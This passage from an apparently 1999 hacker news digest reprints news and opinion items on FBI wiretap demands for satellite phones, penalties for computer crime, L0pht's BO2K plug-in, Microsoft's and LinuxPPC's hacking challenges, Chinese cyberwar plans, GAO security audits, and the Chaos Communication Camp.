Kid The Federal Communications Commission is holding up critical operating licenses for several small satellite phone companies until they have finished talking with the FBI. The CALEA Act passed in 1994 requires telephone companies to provide law enforcement with access to digital call information, including the ability to tap calls and determine the location of users. Several satellite phone companies are in long negotions with the FBI to ensure that their systems comply with the law. C | Net http://www.news.com/News/Item/0,4,40048,00.html?st.ne.fd.gif.e FBI wiretap worries slow satellite phones By John Borland Staff Writer, CNET News.com August 3, 1999, 4 a.m. PT URL: http://www.news.com/News/Item/0,4,40048,00.html The Federal Bureau of Investigation is putting the brakes--at least temporarily--on the satellite phone industry. The FBI and other U.S. law enforcement agencies are worried that new space-based telephone systems, which theoretically allow a person to use a wireless phone from virtually anywhere on earth, will undermine their ability to wiretap telephone calls and trace criminals through cellphones. Federal communications officials are holding up critical operating licenses for Globalstar and a handful of smaller satellite phone services while they negotiate with the FBI over wiretapping issues. "These are borderless systems," said Mac Jeffery, a spokesman for Globalstar, a satellite phone provider scheduled to launch service in North America by the end of this year. "But it's not really a borderless world from the legal perspective yet." Globalstar, Iridium, and a handful of other companies are leading an ambitious push to create a network of satellites that compete with traditional cellular phone service. The industry has already run into growing pains--Iridium, the first and largest system to launch, has run into severe financial difficulties after falling short of subscriber goals. The wiretapping issue affects these companies and a handful of other non U.S.-based smaller satellite phone providers which are seeking licenses to operate in the United States, but have land-based equipment located in Canada. A 1994 U.S. law, dubbed the Communications Assistance for Law Enforcement Act (CALEA), requires telephone companies to provide law enforcement with access to digital call information, including the ability to tap calls and determine the location of users. That law has proven controversial. Privacy rights groups have protested that the FBI is encroaching on citizens' rights in their push to tap phone calls. Meanwhile, the FBI has said that industry proposals for following the law don't go far enough. The Federal Communications Commission has yet to make a final ruling on the laws. The FBI's concerns with satellite phone providers do include figuring out how they fit into this law's framework, said one department official. But the Bureau's concerns are larger and more immediate, which has led to the current delay in licensing the services. Some of these satellite systems are unable to provide information on a caller's location. This information is critical for law enforcement, the FBI says, so it can know whether or not it can legally seek a U.S. court order to tap the phone calls. Canada's TMI Communications, which has seen its U.S. license application languish in the FCC for close to 16 months, faces this objection. Department of Justice officials are reportedly asking the company to include some kind of global positioning system in TMI phones that would at least determine which country a caller was in. TMI executives confirmed that they are discussing possible ways to solve the dilemma with U.S. law enforcement officials, but would not comment further. Because its system is configured differently, Globalstar doesn't face this issue. But because it wants to set up two of its four land-based receiving stations in Canada, it is in a different--and perhaps more technically challenging--situation. The FBI is concerned that it would have to go through Canadian government officials to win a wiretap on any calls going through these stations--an idea it strongly opposes. Allowing information about surveillance operations to go through foreign government channels would be a serious violation of national security, one FBI official said. All the companies involved are negotiating these issues with the FBI, and have each proposed a series of technical and policy solutions to the problem unique to their own networks. But according to Washington sources, senior trade and law enforcement officials from Canada and the United States have also discussed the problem, with an eye to settling national security concerns on a policy level with a minimum impact on industry development. Meanwhile, the FCC is waiting and watching. The FBI and the Department of Justice have no official power to hold up the companies' operating licenses, but regulators are waiting for a resolution to the talks anyway. "The parties are discussing this," said one FCC official, who asked to remain anonymous. "In the absence of indications that this is not moving forward, we would like to give that process a chance to work." The dispute is similar to the fight being waged by U.S. software companies, who are barred from exporting strong encryption programs overseas. The FBI has lobbied to bar these exports--and has advocated for stricter rules governing use of encryption inside the United States--arguing that law enforcement needs to be able to crack encryption on encoded email messages of criminals and terrorists. As with the software companies, the satellite firms are taking a conciliatory stance, hoping to get federal approval before the issue begins cutting into their official launch date. Globalstar, which is slated to go live in North America by the end of this year, says it doesn't expect the issue to push that date back. "Obviously some modifications are going to be made in order to make sure that national security is intact," said Andy Radlow, a spokesman for Vodafone AirTouch, the company handling Globalstar's North American business. "But we don't foresee launch delays." @HWA 18.0 InfoCriminals Should Face Reasonable Penalties ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A very interesting opinion piece in Sunday's San Jose Mercury News asks some very poignant questions. The article calls for reasonable sentences for InfoCriminals, methods to be developed so that they are caught and says that companies should be held just as responsible as InfoCriminals for security violations. (This is the first time I have seen the word "InfoCriminals" used. I like it.) San Jose Mercury Mews http://www7.mercurycenter.com/premium/business/docs/hotbutton01.htm Published Sunday, August 1, 1999, in the San Jose Mercury News Companies should be required to have their information security systems audited on a regular basis, says Steph Marr, vice president of Predictive Systems Inc.'s information security practice in Santa Cruz. Setting the trap for hackers A truly rational criminal system would provide near-certainty that transgressors would be caught -- and punish companies with lax security BY STEPH MARR THE recent spate of viruses has put us back on red alert -- the bad boys are still out there. And if they're caught, like David L. Smith, the alleged father of ``Melissa,'' they may face ridiculously high penalties -- penalties that are way out of line with their actual threat to society. However, these penalties are necessary in order to establish some semblance of deterrence, because the probability of getting caught is near zero. We need to increase that probability. Here's a formula that explains why we seem unable to stop hackers and other computer criminals: The value of a crime equals the penalty times the risk of getting caught. The concept is simple. If the value of the ``prize'' is higher than the penalty multiplied by the risk of getting caught, most hackers will go for it. For example, if a hacker breaks into a bank's server and steals $1 million and the penalty for the crime is 10 years, it's worth it if the risk of getting caught is near zero. You do the math. A truly rational criminal system would provide near-certainty that transgressors would be caught. When caught, they would receive a penalty that is precisely commensurate with their crime. For example, if a hacker breaks into a bank's computer and steals $1 million, that's bank robbery. There are currently laws that address bank robbery and the penalties that apply. Similarly, if hacking occurs over state lines, wouldn't that constitute interstate transportation of stolen property? My point is that rather than apply grossly overstated penalties to an InfoCrime, we should simply apply the penalties already established for ``real world'' parallels. But this only works if the criminals are likely to be caught -- which is not where we are today. In recent years, few InfoCriminals have been caught and punished. To address this, we need responsible parties -- such as the government, private institutions and computer vendors -- to introduce greater risk into the hacker equation. The first step would be to encourage better record keeping of who does what, and when. For example, handling virus problems could be comparatively easy if we refused to run ``anonymous'' programs. Microsoft has built this ability into its browser, as have others. It's a simple matter to set the system to refuse to run code that doesn't have a known source. Furthermore, we need to foster a system whereby critical information, such as medical or financial records, simply cannot be accessed without a clear record of precisely who did what and when. This is the responsibility of the medical or the financial communities. We need legislation to require these organizations to take strong measures to protect information kept about us, or for us. Some information may be collected as a normal part of transacting business with any organization, but limits on the use of that information need to be in place. It is the responsibility of businesses and institutions to safeguard the information we give them. If they fail to do so, they should be penalized, along with the hackers. If a high-school student can crack the Pentagon, then both the student and the Pentagon should be held accountable. If the Pentagon can't defend against our own students, how are they ever going to stand up to a true InfoWar from a foreign government? Companies should be required to have their information security systems audited on a regular basis, just as they have their books audited. And, just as incorrect bookkeeping can lead to civil and criminal penalties, so too should information security errors. For example, if it can be proved that a company could easily have done a better job of security, the company itself -- in addition, of course, to the hacker -- should be punished. Fines could be collected from the company to compensate those people whose information was lost or stolen. This is the only way we can make information security -- and the safety of our private information -- a standard business practice. We need the vendors of consumer products to be held accountable for the products they create. If Intuit is going to be in the business of selling consumer financial management software, it should be responsible for building in the safeguards and the protections that are appropriate for that information. If Microsoft is going to be in the business of selling consumer operating systems, it should be responsible for providing an environment which is robust, free from known defects and protects consumer information, by default. Users should be free to accept additional risks, but it should be informed consent. Responsible software and responsible institutions would eliminate hacking without risk. Then we can move on to creating realistic penalties for InfoCrimes. @HWA 19.0 L0pht Professional Plugin Pack For BO2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Megan A. Haquer L0pht Heavy Industries has announced that they are developing a line of professional plugins for the robust remote administration tool BO2K. The first of these plugins BOTOOL was released yesterday. BOTOOL allows the administrator to remotely manage files and the remote registry. This allows you to upload and download files securely, as well as copy, rename and delete files and directories. The remote registry editor allows you full registry editing capabilities over the BO2K secure command channel. L0pht Heavy Industries http://www.l0pht.com/ -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- L0pht releases first BO2K plug-in By Robert Lemos, ZDNN August 4, 1999 2:38 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2309393,00.html The controversial Back Orifice 2000 has some company. On Tuesday, the white-hat hacking think-tank L0pht Heavy Industries posted its first of three plug-ins for the program, which has been alternately called a remote administration application or a hacking tool, depending on the user's point of view. Called BOTOOL, the program allows users to perform point-and-click file transfers and registry editing. The L0pht intends to release at least two more plug-ins: BOPEEP and BOSCRIPT. Back Orifice (BO2K), whose name spoofs that of Microsoft Corp.'s (Nasdaq:MSFT) Back Office, originally hit the Internet last year when the Cult of the Dead Cow, a less virginal hacking group, announced the program at the hacking confab known as DEF CON. Last month, the Cult of the Dead Cow followed up with an upgraded version known as BO2K, which had racked up 128,776 app downloads as of July 22. Once the "server" part of the program is installed on a target PC, a user -- or hacker -- can remotely control that PC through the Internet using the "client" program. The program runs on Windows 95/98, NT and 2000 and uses encryption to secure client-server communications. Internet security firms and Microsoft have called the program malicious and have posted security warnings about it. @HWA 20.0 MS Wants Free Publicity ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ found on slashdot In an obvious ploy to get free publicity Microsoft has set up a Windows 2000 machine on the internet and invited people to break in. Microsoft wants to create the most secure version of Windows ever, which is a laudable goal. It is hoped that this is not a primary testing method. Not only is attacking a system blind over the net probably one the hardest things to do but the people who could actually accomplish this task have more important things to do other than testing Microsoft products for free. Of course a few months from now I'm sure we will hear how Windows 2000 stood up to X number of 'hack' attempts via the internet and is now the most secure version of Windows ever. Phalease. http://www.windows2000test.com/ <- hack me 20.1 MS: a crashed site is hard to hack! ---------------------------------- This story was printed from Sm@rt Reseller, located at http://www.zdnet.com/sr. -------------------------------------------------------------- Microsoft to Hackers: Crack This! By David Raikow, Sm@rt Reseller August 4, 1999 3:24 PM PT URL: http://www.zdnet.com/sr/stories/news/0,4538,2309474,00.html In an attempt to burnish its tarnished reputation for network security, Microsoft issued an open challenge on Tuesday to the hacking community. But potential testers barely got a chance to attempt to break Windows 2000’s security system, as the test server Microsoft offered crashed and stayed down for most of the past 24 hours. Microsoft placed a web server running the latest beta of Windows 2000 and Internet Information Server (IIS) outside its firewalls, and invited the public to go after target files and user accounts it placed there. The company’s reason for doing so? "We hope that this kind of open testing will allow us to ship our most secure OS yet," said a Microsoft spokesperson. The hacking community was and is largely unimpressed, however. In its posted coverage, the Hacker News Network called the challenge "an obvious ploy to get free publicity...It is hoped that this is not a primary testing method." Members of the Linux-enthusiast site Slashdot for the most part concurred, accusing Microsoft of using anti-Microsoft sentiment for free auditing. Meanwhile, the Linux community created a counter-challenge of its own. Tuesday afternoon, LinuxPPC, the developers and distributors of a PowerPC-native version of Linux, challenged hackers to crack one of its servers. Unlike Microsoft, which did not offer any kind of incentive or award to hackers, LinuxPPC is giving the machine to the first person to break in. Whoops! If it was meant as a publicity stunt, the Microsoft security challenge may have backfired. As soon as the site went online, Microsoft ran into technical difficulties with the test server. Early visitors reported problems with the home-page HTML and Javascript, some serious enough to prevent them accessing the page at all. Posted status logs indicate that the server had to be rebooted at least once because the system log was full, and some services were unavailable at reboot. Most significantly, the server was offline for most of Tuesday due to what Microsoft described as "router problems". Though intermittently available Wednesday morning, the site was down at press time, and appears to have been pulled from DNS servers entirely; ping tests indicated the MS router was functional. Some Slashdot contributors reported seeing a notice that the site had been withdrawn, but no such notice is currently posted on any publicly accessible MS server. A Microsoft spokesperson attributed some of the difficulties to thunderstorms in Seattle on Tuesday, but had no comment on the site's status at press time. @HWA 21.0 China Seeks to Develop Infowar Capabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid A Chinese military newspaper covering the activities of China's Peoples Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools. Internet News http://www.internetnews.com/intl-news/article/0,1087,6_173341,00.html Chinese Military Seeks to Train Cyber Warriors August 3, 1999 Hans Lombardo, Managing Editor, asia.internet.com International News Archives [Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training hackers to take the battle online. The Liberation Army Daily (LAD), a mouthpiece of China's Peoples Liberation Army (PLA), recently called for the development of this capability. The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be prepared for an Internet war. The call was made in response to several hacking incidents in the US and China after NATO's bombing of the China's Belgrade Embassy. The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers. In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the Interior (DOI), the US Embassy in China, and the Naval Communications Command. Nearly a thousand US civilian sites were broken into in the two days following the bombing, sources said. According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China. More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong. Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or brought down by hackers traced to Chinese domains. In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center and The China Daily have set up anti-Falun Gong sites. Copyright 1999 internet.com Corp. All Rights Reserved. Legal Notices, Reprints. @HWA 22.0 Online Banking Still Risky Congress Says ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Inf0rmant Over 6 million Americans use the internet to do their banking, pay bills, transfer money, apply for loans, etc. A new report released by the General Accounting Office examined 81 financial institutions and found that 35 of them, about 44 percent, had not taken all the risk-limiting steps regulators had recommended. Unfortunately the report did not examine the client side security of internet banking. With programs like NetBus and BO2K floating around that is where the real danger lies. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,77392-122285-862902-0,00.html Many banking firms' online options still risky, GAO says Copyright © 1999 Nando Media Copyright © 1999 Associated Press By MARCY GORDON WASHINGTON (August 3, 1999 10:57 a.m. EDT http://www.nandotimes.com) - Internet banking carries more risk than the traditional bricks-and-mortar variety, yet 44 percent of the financial institutions in a survey hadn't taken all the steps deemed necessary to limit risks, congressional investigators said in a new report. The number of banks, thrifts and credit unions offering Internet banking has nearly tripled over the past year, and more than 6 million Americans go online to transfer money between accounts, pay bills, check account or investment balances and apply for loans. Some lawmakers are concerned about the safety and security of online banking and the possibility that consumers could lose money or have their financial privacy breached by hackers. "The American banking system has proven capable of providing full security and privacy," said Rep. Spencer Bachus, R-Ala., chairman of the House Banking subcommittee on monetary policy. "Our challenge is making sure the current rush to technology does not outpace that proven ability." The new report by the General Accounting Office, Congress' investigative arm, concludes that Internet banking is by nature riskier than conventional banking. The GAO's review of banking regulators' examinations of 81 financial institutions found that 35 of them, about 44 percent, hadn't taken all the risk-limiting steps regulators have said are needed. The report was being released Tuesday at a hearing of Bachus's subcommittee. It found, for example, that the boards of directors of some financial institutions had failed to approve strategic plans for Internet banking, and some institutions lacked policies and procedures covering online operations. The report noted that despite these deficiencies, the review - conducted from April 1998 to May 1999 - didn't turn up any financial losses or security breaches in online banking. However, the GAO auditors said, the sample of bank examinations reviewed was too small to support strong conclusions about the banking industry. Relatively few examinations have been conducted because Internet banking is fairly new and examiners have focused on the banking industry's efforts to solve the Year 2000 computer problem, the GAO said. In a related development, federal regulators reported Monday that 99 percent of the nation's federally insured banks, thrifts and credit unions have successfully completed preparations for the millennial date change. Many major U.S. banks now offer Internet banking, supplementing their traditional branch services. In addition, there has been a recent push toward virtual, branchless banking, with online brokerage firm ETrade acquiring Telebanc Financial for $1.6 billion and Bank One launching WingspanBank.com. Yet, even with the explosive growth of electronic commerce and online investing, most consumers are still somewhat hesitant about conducting financial transactions on the Internet, and even more so when it comes to managing their finances. According to a June report by investment firm Goldman Sachs, only as many as 4 percent of U.S. households currently use online banking products. That number is expected to jump to about 20 percent by 2002. @HWA 23.0 NIPRNet Access Restricted ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench A directive to eliminate unauthorized access to the Non-Classified IP Router Network will soon be issued from The Office of the Secretary of Defense. DOD is cracking down on unofficial connections to NIPRNet in an effort to increase security. Government Computer News http://www.gcn.com/vol18_no24/news/351-1.html August 2, 1999 DOD will crack down on access to Niprnet By Bill Murray GCN Staff The Office of the Secretary of Defense soon will issue a directive to eliminate unauthorized back-door access to the Non-Classified IP Router Network. “It’s being worked on right now,” said Air Force Maj. Gen. John H. Campbell, vice director of the Defense Information Systems Agency, who spoke at length recently about much of the work on DISA’s plate. “Unless you have a waiver with a specific reason,” Defense Department agencies will not be allowed to maintain these unapproved links, Campbell said in a recent interview. It’s unofficial. DOD officials are cracking down on unofficial connections to improve security, he said. “The NIPRnet grew up around convenience, not security,” Campbell said. With electronic commerce, logistics and other business processes heavily reliant on the Internet, DISA officials are using eight official NIPRnet gateways to improve access, Campbell said. Meanwhile, regarding the Defense Information Infrastructure’s Common Operating Environment, senior DOD brass recently reaffirmed their support for the DISA-run interoperability effort, Campbell said. The department’s work on developing an enterprisewide systems plan, known as the Global Network Information Enterprise initiative, will not eliminate DII COE, he said, echoing comments made recently by Marvin Langston, DOD’s deputy chief information officer [GCN, May 10, Page 1]. Campbell said DOD officials are also pleased with the progress of Defense Message System installations. More than 210 sites worldwide use it, he said. Organizational use doubled during the past two months, while AUTODIN use decreased, Campbell said. DISA’s Joint Interoperability Test Command is testing DMS Release 2.1, Campbell said. “The directories and infrastructure are stable and responsive,” he said. Message exchange, delivery, speed of service and other critical performance measures “appear to be doing well,” he said. DISA is planning several pilots later this year in support of medium-grade messaging, a managed commercial e-mail service targeted at users who do not need command and control capabilities, Campbell said. Medium-grade messaging will use DOD public-key infrastructure software certificates, he said. Campbell also praised the way DOD handled the Melissa virus. He said the department’s systems defense team worked with software vendors to ensure software patches were available for DOD users to download within six hours of the first reports of the outbreak. “By midnight, both patches worked, and they were posted on a Web site,” said Campbell, who is commander of the department’s Joint Task Force for Computer Network Defense. Campbell said he was paged about the first DOD Melissa infections at 6:30 p.m. on March 26. The department’s Computer Emergency Response Center officials from each service asked organizations to post banners on their networks asking users not to open e-mail messages with subject headers reading “important message from,” even if they knew the sender. CERC has primary, day-to-day interaction with DOD organizations, Campbell said, and it reports to the task force, which is primarily concerned with organized attacks on Defense systems. For example, no such attacks materialized during Operation Allied Force, Campbell said. “There was quite a bit of hacker activity from Serbia, but by and large it falls into the nuisance category,” such as defacing Web sites, he said. Network Associates Inc. of Santa Clara, Calif., and Symantec Corp. of Cupertino, Calif., the companies that produced the patches for Melissa, hold antivirus software licenses with DISA. Campbell said DISA officials have committed to giving the task force $3.2 million in fiscal 2000. @HWA 24.0 Gov Employees Personal Privacy at Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarge Information stored on the National Finance Center's computer systems, including sensitive government personnel and financial information, is at risk of disclosure or destruction. The GAO report found that the NFC, under the Agriculture Department's control, had given legitimate users too much access. The NFC said it has completed some corrective actions and is working on the rest. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0802/web-nfc-8-3-99.html AUGUST 3, 1999 . . . 13:20 EDT GAO finds security lax for federal employees' personal info BY COLLEEN O'HARA (ohara@fcw.com) Weak access controls are placing sensitive government personnel and financial information stored on the National Finance Center's computer systems at risk of disclosure or destruction, according to a new General Accounting Office report. The Agriculture Department's NFC operates financial systems such as payroll/personnel and accounting systems for the USDA and about 60 other federal organizations. The NFC also maintains the records of the multibillion dollar Thrift Savings Program, a type of 401(k) program for federal employees. The GAO concluded that problems with NFC's access control "placed sensitive personnel information at risk of disclosure, critical financial operations at risk of disruption and assets at risk of loss." Logical, system software and physical access controls are designed to protect computer databases from enabling unauthorized users to access or change the data stored in the systems. The GAO found that NFC had given legitimate users too much access to financial and sensitive personal information. For example, GAO found that 86 users had the ability to read and alter any data stored on tape regardless of other security software controls that were in place. NFC said they have taken steps to limit this access, according to the report. In addition, GAO found that users could bypass certain access controls and gain unauthorized access to financial and other sensitive data that the NFC maintains or cause system failures. For example, the system software that controls batch processing allowed any user with the ability to execute a batch program also to shut down the system or turn off features such as the security software. In its response to the report, the NFC said it has "already completed corrective actions on most of the items and [it has] planned appropriate corrective actions on the rest." @HWA 25.0 Other Security Challenges Offered ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue Yesterday Microsoft placed a Windows 2000 machine outside of its firewall and asked people to break into it. Today the folks at LinuxPPC have issued a similar challenge except they are offering the machine itself to the person who breaks in while Microsoft has not offered any incentive. The Microsoft site was down most of the day yesterday and the LinuxPPC site was unreachable this morning when we attempted to check it. Companies need to realize that these "Hacker Challenges" are not valid testing methods and are nothing more than publicity stunts. If you want a valid security assessment then spend the money and hire an independent third party to review your product. Windows 2000 Test http://www.windows2000.com Linux PPC http://crack.linuxppc.org/ ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html See also a previous article in the HNN Buffer Overflow section The Hacker Challenge http://www.hackernews.com/orig/chall.html Reprinted below from an earlier version of HHN The Hacker Challenge By: Qubik (qubik@bikkel.com) You have probably read about them and some of you may have even participated in one or two. Hacker challenges; where your asked to bypass the latest security measure implemented into technology which is already, prior to testing, dubbed as the latest in computer protection. But for what in return? Most challenges offer a reward of some sorts, a reward which is more often than not, a five or six figure with a dollar sign placed neatly at the beginning. So just what is the deal with these challenges? What purpose do they really serve and are they just marketing ploys? I'd like you to imagine for a moment that you're an administrator of a small corporate network. It's not the most exciting of jobs, and you don't have time to keep up with the latest going ons in the security scene. Your network has been attacked a few times before, and you start to think about upgrading your security. So where do you start? Where else would you start, but the internet? It's the worlds largest resource, and every good company dealing with network security, is bound to be on the internet somewhere. So you use a search engine or two and you come across a web site for a new state of the art firewall, who's manufacturers claim it resisted every hacker that attempted to hack it at a recent hacker convention. Your amazed, surely their high price tag is nothing for complete security!? Only what if it is all a clever ploy, haven't you got to ask yourself just how many people actually tried to hack into that particular piece of software? Haven't you got to look into the reputation of the manufacturer? Of course you do! To be sure, you've got to ask for the cold hard facts, not the marketing babble! There are serious flaws in many hacker challenges, not the least being that most 'real' hackers only hear about them after they've finished. This makes you wonder just who took part, and how they found out about it. It's not uncommon for hackers and security analysts to earn wages in excess of six figures, and to earn such wages, you've got to be either very lucky, or very busy. So what's your guarantee that a hacker who actually knows what he is doing, actually took the time out to earn a, comparatively, small ten thousand? You have no guarantee at all, why on earth should he or she bother? Next ask yourself whether real hackers would want to find all those bugs in that new technological innovation. Surely their only going to end up making their job, of hacking, harder by pointing them out? However, A low level source code analysis of a piece of software or a close look at hardware by reputable third party security analysis company will delay product ship times and cost a lot more than setting up a hacker challenge. Not to mention that it has nowhere near the same marketing punch. Display your product at an upcoming convention and let people bang on it for a weekend and then claim "Product X survives Hacker Challenge." Makes a great press release. It all seems rather corrupt, with companies hiding the truth and rubbing their hands at the millions they make. A ten thousand dollar reward seems rather pathetic, when your earning ten times that kind of money. Surely these companies know this, are they in fact attempting to social engineer the hackers or maybe worse their customers? But it's not all like that, there are plenty of genuine challenges out there. Some have been set up to test software and, now more and more, hardware, others testing entire networks. For example, recently the Quebec government is enlisting the aid of hackers to test its networks and to research new ways of protecting those networks. So what can we say about hacker challenges? Do they really prove how secure a product is? I don't think so, the fact that most aren't officially announced to the hacker public and that they are often deliberately misinterpret, doesn't give a good impression. But then, who should a company go to? It's not the easiest of tasks in the world, to announce such a challenge. Hack at your own discretion, don't be afraid to take part in a hacker challenge, but don't take the word of the manufacturer, when they say it's secure, just because a few passers by a convention typed a few keys on a keyboard. There will always be flaws in hardware and software, it's up to us to the true hacker to find and fix them, whether we do it for the companies maketing campaign, or for personal gratification. @HWA 25.1 Software developer offers hacker challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://technology.news.com.au/techno/4108922.htm Developer issues hacker challenge By JENNIFER FORESHEW 3aug99 A SMALL Sydney company that has developed software designed to make Web sites hack-proof, has thrown out a challenge to crack the technology. Creative Digital Technology (CDT) has developed software which, when downloaded, makes a site secure. "We are prepared to stand behind that financially by offering a prize to universities to see if they can do what our developers haven't been able to do," CDT chief operating officer Philip Burton said. CDT, which developed the country's first SET (Secure Electronic Transaction) enabled products, is launching the SecurePage product at Internet World 99 this week. "We can protect any Web site," CDT chief executive Bahram Boutorabi said. "The first version of the product runs on Microsoft's Internet Information Server platform, but we are planning to roll out across all platforms." Mr Boutorabi, who is also technology officer, said many sites could be hacked because they were developed using mostly straight text. "We have developed the technology to put something into Active Server Pages, HTML, Net Commerce Mark-up Language and XML, which represents a signature that someone has made against that page," Mr Boutorabi said. Any attempt to alter a Web site's content would result in action being taken by the system, which is protected by 192-bit, Triple-DES encryption. "If the contents of that page have been altered for any reason it will stop serving that content out and serve it from its own content area, where everything is fully encrypted," Mr Boutorabi said. "SecurePage enables an administrator to put a disc into the system, run the administration and tell it to sign all of the pages with their password. "To alter the code or text, you have to have administrative access to change the content or to stop the system." Mr Burton, who is also a senior partner in CDT, said the company began working on the technology after attacks on high-profile Web sites. "This came about from evidence that significant Web sites were being hacked and destroyed. "We believed we could deliver a protection device in software form that could be downloaded from our Web site by whoever was hosting that particular site. CDT declined to reveal further details of the technology pending approval of a patent on SecurePage. If you decide to take up CDT's challenge to crack its software, Computers & High Technology wants to know. E-mail us at auscomp@ozemail.com.au – but only if you are successful. @HWA 26.0 CCC Camp About to Get Under Way ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Frank The organizers of CCC Camp continue their preparations for this weekend. It is expected that 3000 people will descend onto a field outside Berlin where they will share secrets of technology and discuss issues that affect us all. And pick a few locks. Wired http://www.wired.com/news/news/culture/story/21104.html?wnpg=1 HNN Cons Page http://www.hackernews.com/cons/cons.html Chaos in Berlin by Steve Kettmann 3:00 a.m. 5.Aug.99.PDT BERLIN -- This weekend's Chaos Communication Camp outside East Berlin will be more than just a good time, event organizers say. The three-day event will be a combination hacker-fest, technology be-in, workshop smorgasbord, celebration of camping and swimming, and lock-picking seminar -- with metal locks, for a change. Around 3,000 people are expected to attend, each paying an entrance fee of DM150 (US$82). See also: Geekstock: German Hackfest The event will be the first of its kind in Germany, but it draws on the tradition established with two similar events in the Netherlands. CCC organizers have consulted with the people behind Hacking in Progress, the most recent of which was held outside of Amsterdam in scorching weather two summers ago. "We've worked a lot with the Amsterdam people," said Chaos Computer Club spokesman Andy Muller-Maguhn. "Five of them even moved to Berlin for three months to help us get organized, and another 20 are coming for the camp. "HIP was a great experience, but the workshop part of the program was a catastrophe. The heat was so bad and they had tents rented from a circus. The sound was so bad, you couldn't hear it from 10 feet away." Besides hiring a security company with expertise in handling tech events (and decorating them), CCC organizers can also rely on the German flair for organization. More than 300 volunteers have already assembled outside East Berlin and laid down three kilometers of fiber optic cable and 14 kilometers of power cable, among other things. Every aspect of the weekend has been planned diligently. The goal is to provide more than a "hacker holiday," as Muller-Maguhn put it. He aims to encourage some deep thinking about technology and where it's going -- and not just from the kind of people who are light-years ahead of the rest of us. In fact, the first of the 27 workshops is intended to help general-interest participants get a handle on things. It will be called "How to ask for help on the Net," and will be led by CCC member Ron Fulda. "We will not be able to benefit from technology if people feel overrun by it, if people feel handled by machines, rather than feeling that they can handle them," said Muller-Maguhn. "There are a lot of people 35 or 40 who are unemployed because they were replaced in their job by a fucking machine. They just don't understand it." The nod to the less sophisticated is probably a good idea. As much as people in Berlin and elsewhere in Germany might respect the CCC for some of its high-profile exploits -- like hacking into NASA's computer in the mid-'80s -- some worry that they are losing touch with mainstream computer users. "The Chaos Computer Club has done some very interesting things," said Herbert Thaten, whose Netz-Werk cybercafe in East Berlin does a booming business. "They stand for finding holes in the computer systems of big companies. But I went to one of their workshops last year, and it was only for specialists. No one there could understand what the speaker was talking about." The complete list of workshops was due to be posted shortly at the CCC Web site, but another example of the more accessible workshops is "Creating Politics of Crypto Software," led by American hacker Lucky Green. More than half the workshops are in English, and all will be freewheeling affairs, if organizers have their way. "We have a very qualified audience in an informal setting," said another CCC spokesman, Frank Rieger. "If someone is standing up there telling bullshit, he will only be doing it about one minute and then someone will correct him." It's easy to take Rieger at his word, sitting with him in the CCC offices in East Berlin, near Humboldt University, not far from Bertolt-Brecht-Platz. One large white wall is devoid of notable decoration, except for a black-and-white poster of Mahatma Gandhi kneeling and reading -- with an Apple logo in one corner. High on an adjacent wall, next to a painting of Christ -- so the tone of ironic worship is not lost -- is a liberated façade from a Geldautomat, a German ATM machine. The hacker movement in Germany is so high profile it has established itself almost as a branch of government. And it wrestles openly with the question of how to respond to technology. Stefan Wernery, one of the two founding fathers of the CCC, devotes much of his time these days to lock-picking on good, old-fashioned metal, ŕ la Artemus Gordon -- just the sort of thing the least tech-conscious person can appreciate. "It's sort of lock-picking as sporting event," said Rieger. "They are teaching people how unsecure locks are." Even if they may lose touch with the masses at times, CCC members spend a lot of time thinking about how they connect with the general public. "We can say it's important to give the normal people -- and also politicians and journalists -- an understanding of how the tools work," Muller-Maguhn said. "In America, more people have email, yes, but technology is driven by big corporations that think about profit and things like customer profiling. "For us it's important to give all groups an understanding of how computers and networks work. Compared to the US, the European public has very critical discussions about technology. Maybe that's one reason why technology is not integrated so rapidly. "People are not as careless as in the United States. They ask, 'What if?' They think about 1984 and Big Brother. That's always on our minds, so we don't have computers that can be switched to fascist mode," Muller-Maguhn said. That might even translate into Europeans, always considered backward when it comes to new technologies, having a little something to show their American counterparts. "The American hacker community is organized very differently than ours," said Muller-Maguhn. "I find it strange. Some groups are very political. Some are very technical. I have the feeling there is a very little in common between them. I don't even think they like each other. "In Europe we try to be both. We consult with politicians on censoring and so forth, and of course we are in a way a public institution. We try to provide information, freedom, and transparency of technology." @HWA 27.0 Hackers... Those Who Would Be Gods ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Hex_Edit A very interesting perspective about why some people do what they do has been sent to us by a member of the the group "HackCanada". Hex_Edit asks whether it is for the knowledge, just to post graffiti, testing security, or some other reason that drives some members of the community. Hackers... Those Who Would Be Gods http://www.hackernews.com/orig/why.html 